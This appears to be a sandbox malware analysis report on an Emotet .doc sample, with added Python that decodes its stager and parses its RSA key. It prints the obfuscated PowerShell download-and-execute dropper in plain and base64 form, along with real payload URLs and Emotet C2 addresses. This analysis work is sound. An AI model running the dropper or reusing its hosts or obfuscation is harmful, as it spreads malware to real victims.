Analysis

  • max time kernel
    27s
  • resource
    win10v191014
  • submitted
    10/12/2019, 12:08 UTC

General

  • Target

    e4ea8d11c4961b44e32cdcb1cda5fa05b33137c1066761bc195194d9133f13a1.doc

  • Sample

    191210-csaawyhn5x

  • SHA256

    e4ea8d11c4961b44e32cdcb1cda5fa05b33137c1066761bc195194d9133f13a1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
$Foboxugv='Jwgdbdovw';$Teyxaqtcm = '10';$Hofhcdaues='Kurudfxf';$Pisibadb=$env:userprofile+'\'+$Teyxaqtcm+'.exe';$Jirtznfh='Nugmipscu';$Rzjlthdjye=.('new-o'+'b'+'ject') Net.webClieNt;$Ngmoujtjvx='http://myphamthuydung.com/tmp/bwo/*http://lalletera.cat/bootstrap/ilym/*https://www.primepenguin.com/wp-admin/fefkbm/*https://www.ukrembtr.com/wp-admin/s3OYk/*https://shourayinfotech.xyz/wp-includes/pa1uxi/'."S`pLIT"('*');$Rggtgmts='Kkefwpie';foreach($Dqcphkgzdrohf in $Ngmoujtjvx){try{$Rzjlthdjye."dOwn`LOADFI`Le"($Dqcphkgzdrohf, $Pisibadb);$Xbjmpnelnnu='Csclasbl';If ((&('Get-'+'It'+'em') $Pisibadb)."LeN`GTH" -ge 31532) {[Diagnostics.Process]::"StA`Rt"($Pisibadb);$Dkchmzjyh='Pxtdthhe';break;$Zhcnueilm='Cejelwzndv'}}catch{}}$Zcfrxytdkvwd='Urvbnvft'
URLs
exe.dropper

http://myphamthuydung.com/tmp/bwo/

exe.dropper

http://lalletera.cat/bootstrap/ilym/

exe.dropper

https://www.primepenguin.com/wp-admin/fefkbm/

exe.dropper

https://www.ukrembtr.com/wp-admin/s3OYk/

exe.dropper

https://shourayinfotech.xyz/wp-includes/pa1uxi/
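
The ps1 source above is what the -en argument in the process tree decodes to. The Python below is an added analysis example, not code from the Triage report or from the sample: it shows that -EncodedCommand is base64 over the UTF-16LE script, strips the backtick and 'a'+'b' concatenation tricks, and recovers the same URL list, drop path and size check the report lists. STAGER is the script copied from this page; the helper names, the %USERPROFILE% rendering of $env:userprofile and the regex-based evaluation are this example's own choices (a real PowerShell tokenizer would be more general).

```python
"""Decode and de-obfuscate the PowerShell stager carried by the .doc sample.

Added analysis example; not code from the Triage report or from the sample.
"""
import base64
import re

# Constructed input: the stager exactly as the report shows it under
# Malware Config / Extracted / ps1 (copied verbatim from this page).
STAGER = (
    "$Foboxugv='Jwgdbdovw';$Teyxaqtcm = '10';$Hofhcdaues='Kurudfxf';"
    "$Pisibadb=$env:userprofile+'\\'+$Teyxaqtcm+'.exe';$Jirtznfh='Nugmipscu';"
    "$Rzjlthdjye=.('new-o'+'b'+'ject') Net.webClieNt;"
    "$Ngmoujtjvx='http://myphamthuydung.com/tmp/bwo/*http://lalletera.cat/bootstrap/ilym/*"
    "https://www.primepenguin.com/wp-admin/fefkbm/*https://www.ukrembtr.com/wp-admin/s3OYk/*"
    "https://shourayinfotech.xyz/wp-includes/pa1uxi/'.\"S`pLIT\"('*');$Rggtgmts='Kkefwpie';"
    "foreach($Dqcphkgzdrohf in $Ngmoujtjvx){try{$Rzjlthdjye.\"dOwn`LOADFI`Le\"($Dqcphkgzdrohf, $Pisibadb);"
    "$Xbjmpnelnnu='Csclasbl';If ((&('Get-'+'It'+'em') $Pisibadb).\"LeN`GTH\" -ge 31532) "
    "{[Diagnostics.Process]::\"StA`Rt\"($Pisibadb);$Dkchmzjyh='Pxtdthhe';break;$Zhcnueilm='Cejelwzndv'}}catch{}}"
    "$Zcfrxytdkvwd='Urvbnvft'"
)


def decode_encoded_command(blob: str) -> str:
    """powershell -en / -EncodedCommand takes base64 of the script as UTF-16LE."""
    return base64.b64decode(blob).decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; shows the shape of the -en blob in the tree."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Backtick escapes PowerShell honours inside double-quoted strings. A backtick
# before any other character is simply dropped, which is what "S`pLIT" relies on.
_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0", "a": "\a",
            "b": "\b", "f": "\f", "v": "\v", "`": "`"}


def deobfuscate(script: str) -> str:
    """Undo the string-level tricks; control flow is left exactly as written."""
    # This sample only uses backticks inside double-quoted member names.
    s = re.sub(r"`(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), script)
    # Collapse 'a'+'b'+'c' chains into one literal, e.g. ('new-o'+'b'+'ject').
    while True:
        joined = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", s)
        if joined == s:
            break
        s = joined
    s = re.sub(r"[.&]\('([^']+)'\)", r"\1", s)      # .('new-object') -> new-object
    s = re.sub(r'\."([A-Za-z_]+)"', r".\1", s)         # ."SpLIT"(  -> .SpLIT(
    s = re.sub(r'::"([A-Za-z_]+)"', r"::\1", s)        # ::"StARt"( -> ::StARt(
    return s


def _eval_concat(expr: str, literals: dict) -> str:
    """Evaluate a chain of 'literal' + $var + $env:VAR terms."""
    out = []
    for part in re.split(r"\s*\+\s*", expr.strip()):
        if part.startswith("'"):
            out.append(part.strip("'"))
        elif part.lower().startswith("$env:"):
            out.append("%" + part[5:].upper() + "%")   # rendered as %NAME% (this example's choice)
        else:
            out.append(literals.get(part.lstrip("$"), part))
    return "".join(out)


def extract_config(script: str) -> dict:
    """Recover the fields the report lists: payload URLs, drop path, size check."""
    s = deobfuscate(script)
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", s))   # $name='value'
    urls = []
    for value in literals.values():
        if value.startswith("http"):
            urls = [u for u in value.split("*") if u]   # '*' separates the fallback URLs
    m = re.search(r"\$\w+\s*=\s*(\$env:\w+(?:\s*\+\s*(?:'[^']*'|\$\w+))+)", s)
    drop_path = _eval_concat(m.group(1), literals) if m else None
    size = re.search(r"-ge\s+(\d+)", s)                 # minimum size before execution
    return {
        "urls": urls,
        "drop_path": drop_path,
        "min_size": int(size.group(1)) if size else None,
        "downloader": ".downloadfile(" in s.lower(),
        "launch": "[diagnostics.process]::start(" in s.lower(),
    }


if __name__ == "__main__":
    print(encode_command(STAGER)[:40] + "...")    # same prefix as the -en blob in the tree
    for key, value in extract_config(STAGER).items():
        print(f"{key}: {value}")
```

The size check (-ge 31532) is worth keeping in the extracted config: the loop only executes the download if the fetched file is at least that many bytes, so a sinkholed or dead URL returning a small error page is skipped and the next URL is tried, which is why the report's network section shows only the first host being contacted.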

Extracted

Family

emotet

C2

2.38.99.79:80

98.24.231.64:80

47.156.70.145:80

37.59.24.177:8080

66.34.201.20:7080

108.179.206.219:8080

45.56.88.91:443

206.189.112.148:8080

120.150.246.241:80

190.56.255.118:80

200.71.148.138:8080

192.241.255.77:8080

211.63.71.72:8080

190.53.135.159:21

183.102.238.69:465

108.191.2.72:80

107.170.24.125:8080

167.114.242.226:8080

91.73.197.90:80

178.209.71.63:8080

rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6
bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK
LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB
-----END PUBLIC KEY-----
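
The rsa_pubkey.plain value is the key Triage's extractor recovered from the unpacked Emotet binary. The Python below is an added example, not code from the report or the sample: it walks the DER SubjectPublicKeyInfo by hand so an analyst can confirm the extracted blob is a well-formed rsaEncryption key and read off its modulus size and exponent without a crypto library. The PEM is copied from this page; the tag constants, function names and error messages are this example's own.

```python
"""Parse the RSA public key extracted from the sample, without a crypto library.

Added analysis example; not code from the Triage report or from the sample.
"""
import base64

# Constructed input: rsa_pubkey.plain copied verbatim from this page.
EMOTET_PUBKEY_PEM = """-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6
bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK
LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB
-----END PUBLIC KEY-----"""

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")   # 1.2.840.113549.1.1.1

SEQUENCE, INTEGER, BIT_STRING, OID = 0x30, 0x02, 0x03, 0x06


def read_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def pem_to_der(pem: str) -> bytes:
    """Strip the PEM armour and base64-decode the body."""
    body = "".join(line.strip() for line in pem.splitlines() if not line.startswith("-----"))
    return base64.b64decode(body)


def parse_rsa_spki(pem: str) -> dict:
    """SubjectPublicKeyInfo = SEQUENCE { AlgorithmIdentifier, BIT STRING { RSAPublicKey } }."""
    der = pem_to_der(pem)
    tag, spki, end = read_tlv(der, 0)
    if tag != SEQUENCE or end != len(der):
        raise ValueError("not a single DER SEQUENCE")
    tag, alg, pos = read_tlv(spki, 0)
    if tag != SEQUENCE:
        raise ValueError("AlgorithmIdentifier missing")
    oid_tag, oid, _ = read_tlv(alg, 0)
    if oid_tag != OID or oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bits, _ = read_tlv(spki, pos)
    if tag != BIT_STRING or bits[0] != 0:
        raise ValueError("unexpected BIT STRING (tag or unused-bits byte)")
    tag, rsa, _ = read_tlv(bits, 1)             # skip the unused-bits byte
    if tag != SEQUENCE:
        raise ValueError("RSAPublicKey missing")
    tag, n_bytes, pos = read_tlv(rsa, 0)
    tag2, e_bytes, _ = read_tlv(rsa, pos)
    if tag != INTEGER or tag2 != INTEGER:
        raise ValueError("modulus/exponent are not INTEGERs")
    n = int.from_bytes(n_bytes, "big")          # DER prefixes 0x00 when the top bit is set
    e = int.from_bytes(e_bytes, "big")
    return {"modulus_bits": n.bit_length(), "exponent": e, "modulus": n}


if __name__ == "__main__":
    key = parse_rsa_spki(EMOTET_PUBKEY_PEM)
    print(f"RSA-{key['modulus_bits']}, e={key['exponent']}, n=0x{key['modulus']:x}")
```

For this sample the walk yields a 768-bit modulus with e = 65537; that short key length is one of the properties that distinguishes an extracted Emotet key from an ordinary TLS or SSH public key, and checking it this way catches truncated or mis-copied PEM blocks before they go into a tracker.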

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e4ea8d11c4961b44e32cdcb1cda5fa05b33137c1066761bc195194d9133f13a1.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4812
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:1616
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABGAG8AYgBvAHgAdQBnAHYAPQAnAEoAdwBnAGQAYgBkAG8AdgB3ACcAOwAkAFQAZQB5AHgAYQBxAHQAYwBtACAAPQAgACcAMQAwACcAOwAkAEgAbwBmAGgAYwBkAGEAdQBlAHMAPQAnAEsAdQByAHUAZABmAHgAZgAnADsAJABQAGkAcwBpAGIAYQBkAGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFQAZQB5AHgAYQBxAHQAYwBtACsAJwAuAGUAeABlACcAOwAkAEoAaQByAHQAegBuAGYAaAA9ACcATgB1AGcAbQBpAHAAcwBjAHUAJwA7ACQAUgB6AGoAbAB0AGgAZABqAHkAZQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBlAHQALgB3AGUAYgBDAGwAaQBlAE4AdAA7ACQATgBnAG0AbwB1AGoAdABqAHYAeAA9ACcAaAB0AHQAcAA6AC8ALwBtAHkAcABoAGEAbQB0AGgAdQB5AGQAdQBuAGcALgBjAG8AbQAvAHQAbQBwAC8AYgB3AG8ALwAqAGgAdAB0AHAAOgAvAC8AbABhAGwAbABlAHQAZQByAGEALgBjAGEAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC8AaQBsAHkAbQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcAByAGkAbQBlAHAAZQBuAGcAdQBpAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAZQBmAGsAYgBtAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB1AGsAcgBlAG0AYgB0AHIALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHMAMwBPAFkAawAvACoAaAB0AHQAcABzADoALwAvAHMAaABvAHUAcgBhAHkAaQBuAGYAbwB0AGUAYwBoAC4AeAB5AHoALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBwAGEAMQB1AHgAaQAvACcALgAiAFMAYABwAEwASQBUACIAKAAnACoAJwApADsAJABSAGcAZwB0AGcAbQB0AHMAPQAnAEsAawBlAGYAdwBwAGkAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQARABxAGMAcABoAGsAZwB6AGQAcgBvAGgAZgAgAGkAbgAgACQATgBnAG0AbwB1AGoAdABqAHYAeAApAHsAdAByAHkAewAkAFIAegBqAGwAdABoAGQAagB5AGUALgAiAGQATwB3AG4AYABMAE8AQQBEAEYASQBgAEwAZQAiACgAJABEAHEAYwBwAGgAawBnAHoAZAByAG8AaABmACwAIAAkAFAAaQBzAGkAYgBhAGQAYgApADsAJABYAGIAagBtAHAAbgBlAGwAbgBuAHUAPQAnAEMAcwBjAGwAYQBzAGIAbAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAFAAaQBzAGkAYgBhAGQAYgApAC4AIgBMAGUATgBgAEcAVABIACIAIAAtAGcAZQAgADMAMQA1ADMAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAdAAiACgAJABQAGkAcwBpAGIAYQBkAGIAKQA7ACQARABrAGMAaABtAHoAagB5AGgAPQAnAFAAeAB0AGQAdABoAGgAZQAnADsAYgByAGUAYQBrADsAJABaAGgAYwBuAHUAZQBpAGwAbQA9ACcAQwBlAGoAZQBsAHcAegBuAGQAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAGMAZgByAHgAeQB0AGQAawB2AHcAZAA9ACcAVQByAHYAYgBuAHYAZgB0ACcA
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:4400
      • C:\Users\Admin\10.exe
        "C:\Users\Admin\10.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:4476
        • C:\Users\Admin\10.exe
          --40d6fa9
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          • Suspicious use of SetWindowsHookEx
          PID:1628

    Network

    • 45.119.214.132:80
      myphamthuydung.com
    • 10.10.0.255:137
    • 10.10.0.10:137
    • 8.8.8.8:53
      myphamthuydung.com

      DNS Request

      myphamthuydung.com

      DNS Response

      45.119.214.132

    • 224.0.0.22

    MITRE ATT&CK Enterprise v6

    Downloads

    • memory/1628-11-0x00000000020B0000-0x00000000020C7000-memory.dmp

      Filesize

      92KB

    • memory/1628-12-0x0000000000400000-0x000000000047C000-memory.dmp

      Filesize

      496KB

    • memory/4476-9-0x0000000002280000-0x0000000002297000-memory.dmp

      Filesize

      92KB